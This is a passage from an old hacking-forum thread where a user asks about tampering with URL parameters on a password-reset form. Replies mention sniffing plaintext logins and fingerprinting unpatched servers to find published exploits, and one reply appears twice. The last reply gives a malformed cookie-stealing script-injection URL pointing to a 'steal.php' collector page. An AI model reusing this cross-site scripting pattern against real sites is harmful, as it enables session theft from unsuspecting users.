are there ways to hack web sites by adding tags to a url
say I have a form with a post or get value lets say its get the form has a field known as email which sends a password to that email I look at the code to find out where its page is redirected to say for example sendpasswrd.php
so instead of submitting the form I execute the command in the url
http://www.mysite.com/sendpasswrd.php?e ... yemail.com
I have heard of code being executed in this way any ideas
I am just curious for the sake of learning
URL Hacking
hacking URLs
Tripod.com used to be real bad with coding for its logins. If you ran a packet sniffer on yourself while you logged in, you could catch your user/pwd in plain text. Angelfire used to submit new user NFO in plain text too. Running a packetsniffer could help you understand the process of login.
When I find a webserver I find its NOS/OS (network operating system), its version, and if it has been patched/updated. Old version of operating systems mean that there are plenty of published exploits for that version of NOS/OS. Searching Packet Storm, Altavista, antionline, whatever, will get you the latest 'sploit. I use copernic for searching zero day published code or hacks..
DNR
When I find a webserver I find its NOS/OS (network operating system), its version, and if it has been patched/updated. Old version of operating systems mean that there are plenty of published exploits for that version of NOS/OS. Searching Packet Storm, Altavista, antionline, whatever, will get you the latest 'sploit. I use copernic for searching zero day published code or hacks..
DNR
Maboroshi, there's a technique some people still use today. All you have to do is make a php page that accept's the "$_GET[];" var. so a url would look like this:
which actually would work. I've even done it my self.
Code: Select all
http://url.com/steal.php?cookie=<sc ript>document.cookie()</scri pt>
¯\_(ツ)_/¯ It works on my machine...